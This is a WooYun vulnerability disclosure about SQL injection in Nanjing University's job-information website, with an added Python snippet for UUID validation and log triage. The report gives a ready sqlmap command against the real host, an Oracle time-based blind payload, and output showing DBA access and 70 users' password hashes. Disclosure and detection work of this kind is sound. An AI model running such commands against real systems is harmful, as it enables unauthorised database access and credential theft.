
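Vulnerability summary

Bug ID: wooyun-2015-0154189

Title: SQL injection in the Nanjing University Student Employment and Entrepreneurship Information Network (DBA privileges + password leak for 70 system administrators)

Vendor: nju.edu.cn

Author: 路人甲

Submitted: 2015-11-19 18:52

Fixed: 2015-11-25 09:00

Disclosed: 2015-11-25 09:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]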


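Vulnerability details

Disclosure status:

2015-11-19: Details reported to the vendor; awaiting vendor handling
2015-11-25: The vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

SQL injection in the Nanjing University Student Employment and Entrepreneurship Information Network (DBA privileges + password leak for 70 system administrators)

Detailed description:

Address: http://job.nju.edu.cn:9081/login/nju/home-article.jsp?ID=03789669-6e58-11e5-99b3-5db8f6fbcd47&type=xyzp&XH=1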

python sqlmap.py -u "http://job.nju.edu.cn:9081/login/nju/home-article.jsp?ID=03789669-6e58-11e5-99b3-5db8f6fbcd47&type=xyzp&XH=1" -p ID --technique=T --random-agent --current-user --is-dba --users --passwords

Proof of vulnerability:

---
Parameter: ID (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ID=03789669-6e58-11e5-99b3-5db8f6fbcd47' AND 3701=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(80)||CHR(107)||CHR(103),5) AND 'EHZZ'='EHZZ&type=xyzp&XH=1
---
web application technology: JSP
back-end DBMS: Oracle
current user: 'USR_JY_YZ'
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ID (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: ID=03789669-6e58-11e5-99b3-5db8f6fbcd47' AND 3701=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(80)||CHR(107)||CHR(103),5) AND 'EHZZ'='EHZZ&type=xyzp&XH=1
---
web application technology: JSP
back-end DBMS: Oracle
database management system users [70]:
database management system users password hashes:

Fix:

Add filtering
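
Added example, not part of the original report: a strict allow-list check for the `ID` parameter, which carries a UUID on this page, together with access-log triage for the time-based payload shown in the proof above. The log layout, the sample lines and the function names are assumptions made for illustration; validation of this kind complements bind variables in the JSP's query rather than replacing them.

```python
import re
import uuid
from urllib.parse import parse_qs, quote, urlsplit

# Oracle calls that stall a query; the report's payload uses DBMS_PIPE.RECEIVE_MESSAGE.
DELAY_CALLS = re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE|DBMS_LOCK\.SLEEP", re.I)
# Assumed log layout: ... "GET <url> HTTP/x" <status> <bytes> <seconds>
LOG_LINE = re.compile(r'"GET (?P<url>\S+) HTTP/[\d.]+" \d{3} \d+ (?P<secs>[\d.]+)$')


def is_canonical_uuid(value):
    """Allow-list check: accept only the hyphenated UUID form the ID parameter carries."""
    try:
        return str(uuid.UUID(value)) == value.lower()
    except ValueError:
        return False


def triage(lines, param="ID", stall_secs=5.0):
    """Return (path, reasons) for every request whose `param` fails the checks."""
    findings = []
    for line in lines:
        m = LOG_LINE.search(line.strip())
        if not m:
            continue
        parts = urlsplit(m["url"])
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            reasons = []
            if not is_canonical_uuid(value):
                reasons.append("not a UUID")
            if DELAY_CALLS.search(value):
                reasons.append("Oracle delay call")
            if reasons and float(m["secs"]) >= stall_secs:
                reasons.append("response stalled")
            if reasons:
                findings.append((parts.path, reasons))
    return findings


# Constructed sample log: a normal request, the payload shown in the report, a quote probe.
GOOD = "03789669-6e58-11e5-99b3-5db8f6fbcd47"
PAYLOAD = (GOOD + "' AND 3701=DBMS_PIPE.RECEIVE_MESSAGE"
           "(CHR(122)||CHR(80)||CHR(107)||CHR(103),5) AND 'EHZZ'='EHZZ")
ENCODED = quote(PAYLOAD, safe="")
PAGE = "/login/nju/home-article.jsp"
SAMPLE_LOG = [
    f'203.0.113.7 - - [19/Nov/2015:18:40:01 +0800] "GET {PAGE}?ID={GOOD}&type=xyzp&XH=1 HTTP/1.1" 200 5120 0.041',
    f'203.0.113.9 - - [19/Nov/2015:18:41:12 +0800] "GET {PAGE}?ID={ENCODED}&type=xyzp&XH=1 HTTP/1.1" 200 5120 5.057',
    f'203.0.113.9 - - [19/Nov/2015:18:41:30 +0800] "GET {PAGE}?ID={GOOD}%27&type=xyzp&XH=1 HTTP/1.1" 500 312 0.030',
]
```
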

Copyright notice: please credit the source 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: no impact, ignored by vendor

Ignored on: 2015-11-25 09:00

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None